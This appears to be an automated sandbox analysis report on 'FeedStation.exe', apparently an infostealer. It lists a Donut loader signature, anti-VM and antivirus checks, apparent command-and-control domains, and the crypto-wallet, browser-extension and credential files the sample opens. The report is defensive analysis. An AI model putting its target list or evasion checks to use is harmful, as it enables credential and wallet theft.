              Source: FeedStation.exe, 00000000.00000003.2360968856.0000000003B09000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/about/gro.allizom.www.CDjelnmQJyZc
              Source: FeedStation.exe, 00000000.00000003.2360968856.0000000003B09000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/contribute/gro.allizom.www.b3lOZaxJcpF6
              Source: FeedStation.exe, 00000000.00000003.2360968856.0000000003B09000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/en-US/privacy/firefox/Firefox
              Source: FeedStation.exe, 00000000.00000003.2360968856.0000000003B09000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/firefox/?utm_medium=firefox-desktop&utm_source=bookmarks-toolbar&utm_campaig
              Source: FeedStation.exe, 00000000.00000003.2360968856.0000000003B09000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/media/img/mozorg/mozilla-256.4720741d4108.jpg
              Source: FeedStation.exe, 00000000.00000003.2360968856.0000000003B09000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/privacy/firefox/gro.allizom.www.
              Source: FeedStation.exe, 00000000.00000003.2311483982.0000000000A8B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.valvesoftware.com/en/contact?contact-person=Translation%20Team%20Feedback
              Source: FeedStation.exe, 00000000.00000003.2410786565.0000000000A86000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.youtube.com
              Source: FeedStation.exe, 00000000.00000003.2410786565.0000000000A86000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.youtube.com/
              Source: unknownNetwork traffic detected: HTTP traffic on port 49783 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49840
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49773
              Source: unknownNetwork traffic detected: HTTP traffic on port 49819 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49783
              Source: unknownNetwork traffic detected: HTTP traffic on port 49840 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49791
              Source: unknownNetwork traffic detected: HTTP traffic on port 49829 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49801 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49807 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49819
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49807
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49829
              Source: unknownNetwork traffic detected: HTTP traffic on port 49847 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49773 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49791 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49847
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49801
              Source: unknownHTTPS traffic detected: 104.102.49.254:443 -> 192.168.2.5:49773 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 104.21.112.1:443 -> 192.168.2.5:49783 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 104.21.112.1:443 -> 192.168.2.5:49791 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 104.21.112.1:443 -> 192.168.2.5:49791 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 104.21.112.1:443 -> 192.168.2.5:49801 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 104.21.112.1:443 -> 192.168.2.5:49807 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 104.21.112.1:443 -> 192.168.2.5:49819 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 104.21.112.1:443 -> 192.168.2.5:49829 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 104.21.112.1:443 -> 192.168.2.5:49840 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 104.21.112.1:443 -> 192.168.2.5:49847 version: TLS 1.2

              System Summary

              barindex
              Source: 00000000.00000002.2417944379.00000000024E0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Donutloader_f40e3759 Author: unknown
              Source: C:\Users\user\Desktop\FeedStation.exeCode function: 0_2_0252FC1A NtCreateSection,NtMapViewOfSection,VirtualAlloc,NtMapViewOfSection,VirtualProtect,VirtualProtect,VirtualProtect,CreateThread,0_2_0252FC1A
              Source: C:\Users\user\Desktop\FeedStation.exeCode function: 0_2_024E07650_2_024E0765
              Source: C:\Users\user\Desktop\FeedStation.exeCode function: 0_2_0252FC1A0_2_0252FC1A
              Source: C:\Users\user\Desktop\FeedStation.exeCode function: 0_2_0250021C0_2_0250021C
              Source: C:\Users\user\Desktop\FeedStation.exeCode function: 0_2_0252B2260_2_0252B226
              Source: C:\Users\user\Desktop\FeedStation.exeCode function: 0_2_024F12390_2_024F1239
              Source: C:\Users\user\Desktop\FeedStation.exeCode function: 0_2_025152DD0_2_025152DD
              Source: C:\Users\user\Desktop\FeedStation.exeCode function: 0_2_0251F2F20_2_0251F2F2
              Source: C:\Users\user\Desktop\FeedStation.exeCode function: 0_2_024EE2E90_2_024EE2E9
              Source: C:\Users\user\Desktop\FeedStation.exeCode function: 0_2_024FE2820_2_024FE282
              Source: C:\Users\user\Desktop\FeedStation.exeCode function: 0_2_024FA3040_2_024FA304
              Source: C:\Users\user\Desktop\FeedStation.exeCode function: 0_2_0252D3C20_2_0252D3C2
              Source: C:\Users\user\Desktop\FeedStation.exeCode function: 0_2_024EA3A20_2_024EA3A2
              Source: C:\Users\user\Desktop\FeedStation.exeCode function: 0_2_025170620_2_02517062
              Source: C:\Users\user\Desktop\FeedStation.exeCode function: 0_2_024E00010_2_024E0001
              Source: C:\Users\user\Desktop\FeedStation.exeCode function: 0_2_0250C00F0_2_0250C00F
              Source: C:\Users\user\Desktop\FeedStation.exeCode function: 0_2_025160210_2_02516021
              Source: C:\Users\user\Desktop\FeedStation.exeCode function: 0_2_024EB0E20_2_024EB0E2
              Source: C:\Users\user\Desktop\FeedStation.exeCode function: 0_2_024FD0B20_2_024FD0B2
              Source: C:\Users\user\Desktop\FeedStation.exeCode function: 0_2_025061740_2_02506174
              Source: C:\Users\user\Desktop\FeedStation.exeCode function: 0_2_0252C11A0_2_0252C11A
              Source: C:\Users\user\Desktop\FeedStation.exeCode function: 0_2_024E81E20_2_024E81E2
              Source: C:\Users\user\Desktop\FeedStation.exeCode function: 0_2_024EA1820_2_024EA182
              Source: C:\Users\user\Desktop\FeedStation.exeCode function: 0_2_0251F6620_2_0251F662
              Source: C:\Users\user\Desktop\FeedStation.exeCode function: 0_2_025176120_2_02517612
              Source: C:\Users\user\Desktop\FeedStation.exeCode function: 0_2_024F762F0_2_024F762F
              Source: C:\Users\user\Desktop\FeedStation.exeCode function: 0_2_024FE6920_2_024FE692
              Source: C:\Users\user\Desktop\FeedStation.exeCode function: 0_2_024F87880_2_024F8788
              Source: C:\Users\user\Desktop\FeedStation.exeCode function: 0_2_024EB7A40_2_024EB7A4
              Source: C:\Users\user\Desktop\FeedStation.exeCode function: 0_2_024F34620_2_024F3462
              Source: C:\Users\user\Desktop\FeedStation.exeCode function: 0_2_024E54E20_2_024E54E2
              Source: C:\Users\user\Desktop\FeedStation.exeCode function: 0_2_0252C4EA0_2_0252C4EA
              Source: C:\Users\user\Desktop\FeedStation.exeCode function: 0_2_024E74F20_2_024E74F2
              Source: C:\Users\user\Desktop\FeedStation.exeCode function: 0_2_025185C20_2_025185C2
              Source: C:\Users\user\Desktop\FeedStation.exeCode function: 0_2_024EC5D20_2_024EC5D2
              Source: C:\Users\user\Desktop\FeedStation.exeCode function: 0_2_0250C5880_2_0250C588
              Source: C:\Users\user\Desktop\FeedStation.exeCode function: 0_2_024FAA420_2_024FAA42
              Source: C:\Users\user\Desktop\FeedStation.exeCode function: 0_2_024F5AD20_2_024F5AD2
              Source: C:\Users\user\Desktop\FeedStation.exeCode function: 0_2_024E4AE20_2_024E4AE2
              Source: C:\Users\user\Desktop\FeedStation.exeCode function: 0_2_024F2A850_2_024F2A85
              Source: C:\Users\user\Desktop\FeedStation.exeCode function: 0_2_02506AA20_2_02506AA2
              Source: C:\Users\user\Desktop\FeedStation.exeCode function: 0_2_024FEB920_2_024FEB92
              Source: C:\Users\user\Desktop\FeedStation.exeCode function: 0_2_024FBB920_2_024FBB92
              Source: C:\Users\user\Desktop\FeedStation.exeCode function: 0_2_024EE8400_2_024EE840
              Source: C:\Users\user\Desktop\FeedStation.exeCode function: 0_2_024EF8520_2_024EF852
              Source: C:\Users\user\Desktop\FeedStation.exeCode function: 0_2_0250C87A0_2_0250C87A
              Source: C:\Users\user\Desktop\FeedStation.exeCode function: 0_2_024E68220_2_024E6822
              Source: C:\Users\user\Desktop\FeedStation.exeCode function: 0_2_0250C88F0_2_0250C88F
              Source: C:\Users\user\Desktop\FeedStation.exeCode function: 0_2_0250D97A0_2_0250D97A
              Source: C:\Users\user\Desktop\FeedStation.exeCode function: 0_2_024F697D0_2_024F697D
              Source: C:\Users\user\Desktop\FeedStation.exeCode function: 0_2_025049620_2_02504962
              Source: C:\Users\user\Desktop\FeedStation.exeCode function: 0_2_025179120_2_02517912
              Source: C:\Users\user\Desktop\FeedStation.exeCode function: 0_2_025029320_2_02502932
              Source: C:\Users\user\Desktop\FeedStation.exeCode function: 0_2_0252C9220_2_0252C922
              Source: C:\Users\user\Desktop\FeedStation.exeCode function: 0_2_024E79B20_2_024E79B2
              Source: C:\Users\user\Desktop\FeedStation.exeCode function: 0_2_02516E020_2_02516E02
              Source: C:\Users\user\Desktop\FeedStation.exeCode function: 0_2_0250CEC20_2_0250CEC2
              Source: C:\Users\user\Desktop\FeedStation.exeCode function: 0_2_024E5E920_2_024E5E92
              Source: C:\Users\user\Desktop\FeedStation.exeCode function: 0_2_0250CF4D0_2_0250CF4D
              Source: C:\Users\user\Desktop\FeedStation.exeCode function: 0_2_024F7F380_2_024F7F38
              Source: C:\Users\user\Desktop\FeedStation.exeCode function: 0_2_0251EFD20_2_0251EFD2
              Source: C:\Users\user\Desktop\FeedStation.exeCode function: 0_2_024E8FB20_2_024E8FB2
              Source: C:\Users\user\Desktop\FeedStation.exeCode function: 0_2_024FDFB20_2_024FDFB2
              Source: C:\Users\user\Desktop\FeedStation.exeCode function: 0_2_02501C620_2_02501C62
              Source: C:\Users\user\Desktop\FeedStation.exeCode function: 0_2_02509C110_2_02509C11
              Source: C:\Users\user\Desktop\FeedStation.exeCode function: 0_2_024EACA20_2_024EACA2
              Source: C:\Users\user\Desktop\FeedStation.exeCode function: 0_2_024F8CBA0_2_024F8CBA
              Source: C:\Users\user\Desktop\FeedStation.exeCode function: 0_2_024E7D520_2_024E7D52
              Source: C:\Users\user\Desktop\FeedStation.exeCode function: 0_2_0251ED020_2_0251ED02
              Source: C:\Users\user\Desktop\FeedStation.exeCode function: String function: 024E9AF2 appears 75 times
              Source: C:\Users\user\Desktop\FeedStation.exeCode function: String function: 024F5AC2 appears 73 times
              Source: FeedStation.exeStatic PE information: invalid certificate
              Source: FeedStation.exeStatic PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, BYTES_REVERSED_LO, 32BIT_MACHINE, BYTES_REVERSED_HI
              Source: 00000000.00000002.2417944379.00000000024E0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Donutloader_f40e3759 os = windows, severity = x86, creation_date = 2021-09-15, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Donutloader, fingerprint = 6400b34f762cebb4f91a8d24c5fce647e069a971fb3ec923a63aa98c8cfffab7, id = f40e3759-2531-4e21-946a-fb55104814c0, last_modified = 2022-01-13
              Source: classification engineClassification label: mal100.troj.spyw.evad.winEXE@1/0@11/2
              Source: C:\Users\user\Desktop\FeedStation.exeCode function: 0_2_024E0E75 CreateToolhelp32Snapshot,Thread32First,Wow64SuspendThread,CloseHandle,0_2_024E0E75
              Source: C:\Users\user\Desktop\FeedStation.exeKey opened: HKEY_CURRENT_USER\Software\Borland\Delphi\LocalesJump to behavior
              Source: C:\Users\user\Desktop\FeedStation.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
              Source: FeedStation.exe, 00000000.00000003.2332999575.00000000037EB000.00000004.00000800.00020000.00000000.sdmp, FeedStation.exe, 00000000.00000003.2332816007.0000000003806000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
              Source: FeedStation.exeReversingLabs: Detection: 55%
              Source: FeedStation.exeVirustotal: Detection: 63%
              Source: C:\Users\user\Desktop\FeedStation.exeFile read: C:\Users\user\Desktop\FeedStation.exeJump to behavior
              Source: C:\Users\user\Desktop\FeedStation.exeSection loaded: apphelp.dllJump to behavior
              Source: C:\Users\user\Desktop\FeedStation.exeSection loaded: version.dllJump to behavior
              Source: C:\Users\user\Desktop\FeedStation.exeSection loaded: olepro32.dllJump to behavior
              Source: C:\Users\user\Desktop\FeedStation.exeSection loaded: wininet.dllJump to behavior
              Source: C:\Users\user\Desktop\FeedStation.exeSection loaded: urlmon.dllJump to behavior
              Source: C:\Users\user\Desktop\FeedStation.exeSection loaded: winmm.dllJump to behavior
              Source: C:\Users\user\Desktop\FeedStation.exeSection loaded: iertutil.dllJump to behavior
              Source: C:\Users\user\Desktop\FeedStation.exeSection loaded: srvcli.dllJump to behavior
              Source: C:\Users\user\Desktop\FeedStation.exeSection loaded: netutils.dllJump to behavior
              Source: C:\Users\user\Desktop\FeedStation.exeSection loaded: mscoree.dllJump to behavior
              Source: C:\Users\user\Desktop\FeedStation.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\FeedStation.exeSection loaded: windows.storage.dllJump to behavior
              Source: C:\Users\user\Desktop\FeedStation.exeSection loaded: wldp.dllJump to behavior
              Source: C:\Users\user\Desktop\FeedStation.exeSection loaded: winhttp.dllJump to behavior
              Source: C:\Users\user\Desktop\FeedStation.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
              Source: C:\Users\user\Desktop\FeedStation.exeSection loaded: webio.dllJump to behavior
              Source: C:\Users\user\Desktop\FeedStation.exeSection loaded: mswsock.dllJump to behavior
              Source: C:\Users\user\Desktop\FeedStation.exeSection loaded: iphlpapi.dllJump to behavior
              Source: C:\Users\user\Desktop\FeedStation.exeSection loaded: winnsi.dllJump to behavior
              Source: C:\Users\user\Desktop\FeedStation.exeSection loaded: sspicli.dllJump to behavior
              Source: C:\Users\user\Desktop\FeedStation.exeSection loaded: dnsapi.dllJump to behavior
              Source: C:\Users\user\Desktop\FeedStation.exeSection loaded: rasadhlp.dllJump to behavior
              Source: C:\Users\user\Desktop\FeedStation.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
              Source: C:\Users\user\Desktop\FeedStation.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
              Source: C:\Users\user\Desktop\FeedStation.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
              Source: C:\Users\user\Desktop\FeedStation.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
              Source: C:\Users\user\Desktop\FeedStation.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
              Source: C:\Users\user\Desktop\FeedStation.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
              Source: C:\Users\user\Desktop\FeedStation.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
              Source: C:\Users\user\Desktop\FeedStation.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
              Source: C:\Users\user\Desktop\FeedStation.exeSection loaded: fwpuclnt.dllJump to behavior
              Source: C:\Users\user\Desktop\FeedStation.exeSection loaded: schannel.dllJump to behavior
              Source: C:\Users\user\Desktop\FeedStation.exeSection loaded: mskeyprotect.dllJump to behavior
              Source: C:\Users\user\Desktop\FeedStation.exeSection loaded: ntasn1.dllJump to behavior
              Source: C:\Users\user\Desktop\FeedStation.exeSection loaded: ncrypt.dllJump to behavior
              Source: C:\Users\user\Desktop\FeedStation.exeSection loaded: ncryptsslp.dllJump to behavior
              Source: C:\Users\user\Desktop\FeedStation.exeSection loaded: msasn1.dllJump to behavior
              Source: C:\Users\user\Desktop\FeedStation.exeSection loaded: cryptsp.dllJump to behavior
              Source: C:\Users\user\Desktop\FeedStation.exeSection loaded: rsaenh.dllJump to behavior
              Source: C:\Users\user\Desktop\FeedStation.exeSection loaded: cryptbase.dllJump to behavior
              Source: C:\Users\user\Desktop\FeedStation.exeSection loaded: gpapi.dllJump to behavior
              Source: C:\Users\user\Desktop\FeedStation.exeSection loaded: dpapi.dllJump to behavior
              Source: C:\Users\user\Desktop\FeedStation.exeSection loaded: kernel.appcore.dllJump to behavior
              Source: C:\Users\user\Desktop\FeedStation.exeSection loaded: uxtheme.dllJump to behavior
              Source: C:\Users\user\Desktop\FeedStation.exeSection loaded: wbemcomn.dllJump to behavior
              Source: C:\Users\user\Desktop\FeedStation.exeSection loaded: userenv.dllJump to behavior
              Source: C:\Users\user\Desktop\FeedStation.exeSection loaded: profapi.dllJump to behavior
              Source: C:\Users\user\Desktop\FeedStation.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
              Source: C:\Users\user\Desktop\FeedStation.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
              Source: C:\Users\user\Desktop\FeedStation.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
              Source: C:\Users\user\Desktop\FeedStation.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
              Source: C:\Users\user\Desktop\FeedStation.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
              Source: C:\Users\user\Desktop\FeedStation.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
              Source: C:\Users\user\Desktop\FeedStation.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
              Source: FeedStation.exeStatic file information: File size 2000360 > 1048576
              Source: FeedStation.exeStatic PE information: Raw size of CODE is bigger than: 0x100000 < 0x144800
              Source: FeedStation.exeStatic PE information: real checksum: 0x19fee2 should be: 0x1e9ce3
              Source: C:\Users\user\Desktop\FeedStation.exeCode function: 0_2_0251D9D2 push eax; mov dword ptr [esp], 060504D3h0_2_0251D9D3
              Source: C:\Users\user\Desktop\FeedStation.exeProcess information set: NOOPENFILEERRORBOXJump to behavior

              Malware Analysis System Evasion

              barindex
              Source: C:\Users\user\Desktop\FeedStation.exeSystem information queried: FirmwareTableInformationJump to behavior
              Source: C:\Users\user\Desktop\FeedStation.exe TID: 3176Thread sleep time: -30000s >= -30000sJump to behavior
              Source: C:\Users\user\Desktop\FeedStation.exe TID: 3176Thread sleep time: -30000s >= -30000sJump to behavior
              Source: C:\Users\user\Desktop\FeedStation.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM Win32_BIOS
              Source: FeedStation.exe, 00000000.00000003.2344100909.000000000387C000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Canara Transaction PasswordVMware20,11696428655x
              Source: FeedStation.exe, 00000000.00000003.2344100909.000000000387C000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: discord.comVMware20,11696428655f
              Source: FeedStation.exe, 00000000.00000003.2344100909.000000000387C000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: interactivebrokers.co.inVMware20,11696428655d
              Source: FeedStation.exe, 00000000.00000003.2344100909.000000000387C000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - COM.HKVMware20,11696428655
              Source: FeedStation.exe, 00000000.00000003.2344100909.000000000387C000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: global block list test formVMware20,11696428655
              Source: FeedStation.exe, 00000000.00000003.2344100909.0000000003881000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: - GDCDYNVMware20,11696428655p
              Source: FeedStation.exe, 00000000.00000003.2344100909.000000000387C000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Canara Transaction PasswordVMware20,11696428655}
              Source: FeedStation.exe, 00000000.00000003.2320951105.0000000000A4D000.00000004.00000020.00020000.00000000.sdmp, FeedStation.exe, 00000000.00000003.2410786565.0000000000A50000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
              Source: FeedStation.exe, 00000000.00000003.2344100909.000000000387C000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - EU East & CentralVMware20,11696428655
              Source: FeedStation.exe, 00000000.00000003.2344100909.000000000387C000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Canara Change Transaction PasswordVMware20,11696428655^
              Source: FeedStation.exe, 00000000.00000003.2344100909.000000000387C000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: account.microsoft.com/profileVMware20,11696428655u
              Source: FeedStation.exe, 00000000.00000003.2344100909.000000000387C000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: secure.bankofamerica.comVMware20,11696428655|UE
              Source: FeedStation.exe, 00000000.00000003.2344100909.000000000387C000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: www.interactivebrokers.comVMware20,11696428655}
              Source: FeedStation.exe, 00000000.00000003.2410786565.00000000009F3000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
              Source: FeedStation.exe, 00000000.00000003.2344100909.000000000387C000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - GDCDYNVMware20,11696428655p
              Source: FeedStation.exe, 00000000.00000003.2344100909.000000000387C000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - EU WestVMware20,11696428655n
              Source: FeedStation.exe, 00000000.00000003.2344100909.000000000387C000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: outlook.office365.comVMware20,11696428655t
              Source: FeedStation.exe, 00000000.00000003.2344100909.000000000387C000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: microsoft.visualstudio.comVMware20,11696428655x
              Source: FeedStation.exe, 00000000.00000003.2344100909.000000000387C000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Canara Change Transaction PasswordVMware20,11696428655
              Source: FeedStation.exe, 00000000.00000003.2344100909.000000000387C000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: outlook.office.comVMware20,11696428655s
              Source: FeedStation.exe, 00000000.00000003.2344100909.000000000387C000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: www.interactivebrokers.co.inVMware20,11696428655~
              Source: FeedStation.exe, 00000000.00000003.2344100909.000000000387C000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: ms.portal.azure.comVMware20,11696428655
              Source: FeedStation.exe, 00000000.00000003.2344100909.000000000387C000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: AMC password management pageVMware20,11696428655
              Source: FeedStation.exe, 00000000.00000003.2344100909.000000000387C000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: tasks.office.comVMware20,11696428655o
              Source: FeedStation.exe, 00000000.00000003.2344100909.000000000387C000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - NDCDYNVMware20,11696428655z
              Source: FeedStation.exe, 00000000.00000003.2344100909.000000000387C000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: turbotax.intuit.comVMware20,11696428655t
              Source: FeedStation.exe, 00000000.00000003.2344100909.000000000387C000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: interactivebrokers.comVMware20,11696428655
              Source: FeedStation.exe, 00000000.00000003.2344100909.000000000387C000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - non-EU EuropeVMware20,11696428655
              Source: FeedStation.exe, 00000000.00000003.2344100909.000000000387C000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: dev.azure.comVMware20,11696428655j
              Source: FeedStation.exe, 00000000.00000003.2344100909.000000000387C000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: netportal.hdfcbank.comVMware20,11696428655
              Source: FeedStation.exe, 00000000.00000003.2344100909.0000000003881000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: YNVMware
              Source: FeedStation.exe, 00000000.00000003.2344100909.000000000387C000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - HKVMware20,11696428655]
              Source: FeedStation.exe, 00000000.00000003.2344100909.000000000387C000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: bankofamerica.comVMware20,11696428655x
              Source: FeedStation.exe, 00000000.00000003.2344100909.000000000387C000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: trackpan.utiitsl.comVMware20,11696428655h
              Source: FeedStation.exe, 00000000.00000003.2344100909.000000000387C000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Test URL for global passwords blocklistVMware20,11696428655
              Source: C:\Users\user\Desktop\FeedStation.exeProcess information queried: ProcessInformationJump to behavior
              Source: C:\Users\user\Desktop\FeedStation.exeCode function: 0_2_024E0765 mov edx, dword ptr fs:[00000030h]0_2_024E0765
              Source: C:\Users\user\Desktop\FeedStation.exeCode function: 0_2_024E0D25 mov eax, dword ptr fs:[00000030h]0_2_024E0D25
              Source: C:\Users\user\Desktop\FeedStation.exeCode function: 0_2_024E1374 mov eax, dword ptr fs:[00000030h]0_2_024E1374
              Source: C:\Users\user\Desktop\FeedStation.exeCode function: 0_2_024E1375 mov eax, dword ptr fs:[00000030h]0_2_024E1375
              Source: C:\Users\user\Desktop\FeedStation.exeCode function: 0_2_024E10D5 mov eax, dword ptr fs:[00000030h]0_2_024E10D5

              HIPS / PFW / Operating System Protection Evasion

              barindex
              Source: FeedStation.exeString found in binary or memory: debonairnukk.xyz
              Source: FeedStation.exeString found in binary or memory: diffuculttan.xyz
              Source: FeedStation.exeString found in binary or memory: effecterectz.xyz
              Source: FeedStation.exeString found in binary or memory: deafeninggeh.biz
              Source: FeedStation.exeString found in binary or memory: immureprech.biz
              Source: C:\Users\user\Desktop\FeedStation.exeQueries volume information: C:\ VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\FeedStation.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior
              Source: FeedStation.exe, 00000000.00000003.2405509368.000000000385B000.00000004.00000800.00020000.00000000.sdmp, FeedStation.exe, 00000000.00000003.2390070763.0000000000ABE000.00000004.00000020.00020000.00000000.sdmp, FeedStation.exe, 00000000.00000003.2400418845.000000000385A000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: %ProgramFiles%\Windows Defender\MsMpeng.exe
              Source: FeedStation.exe, 00000000.00000003.2390118118.0000000000AAF000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: fender\MsMpeng.exe
              Source: C:\Users\user\Desktop\FeedStation.exeWMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT * FROM AntiVirusProduct

              Stealing of Sensitive Information

              barindex
              Source: Yara matchFile source: Process Memory Space: FeedStation.exe PID: 6416, type: MEMORYSTR
              Source: Yara matchFile source: sslproxydump.pcap, type: PCAP
              Source: Yara matchFile source: decrypted.memstr, type: MEMORYSTR
              Source: FeedStation.exe, 00000000.00000003.2374434383.0000000000AA2000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: Wallets/Electrum-LTC
              Source: FeedStation.exe, 00000000.00000003.2374434383.0000000000AA2000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: Wallets/ElectronCash
              Source: FeedStation.exe, 00000000.00000003.2374371822.0000000000AAA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: Jaxx Libertyn":")
              Source: FeedStation.exe, 00000000.00000003.2374434383.0000000000AA2000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: window-state.json
              Source: FeedStation.exe, 00000000.00000003.2374979097.0000000000AA5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: Wallets/Exodus
              Source: FeedStation.exe, 00000000.00000003.2374434383.0000000000AA2000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: %appdata%\Ethereum
              Source: FeedStation.exe, 00000000.00000003.2374371822.0000000000AAA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: %localappdata%\Coinomi\Coinomi\wallets
              Source: FeedStation.exe, 00000000.00000003.2374979097.0000000000AA5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: keystore
              Source: C:\Users\user\Desktop\FeedStation.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\onhogfjeacnfoofkfgppdlbmlmnplgbnJump to behavior
              Source: C:\Users\user\Desktop\FeedStation.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ocjdpmoallmgmjbbogfiiaofphbjgchhJump to behavior
              Source: C:\Users\user\Desktop\FeedStation.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fhbohimaelbohpjbbldcngcnapndodjpJump to behavior
              Source: C:\Users\user\Desktop\FeedStation.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\cert9.dbJump to behavior
              Source: C:\Users\user\Desktop\FeedStation.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\HistoryJump to behavior
              Source: C:\Users\user\Desktop\FeedStation.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hifafgmccdpekplomjjkcfgodnhcelljJump to behavior
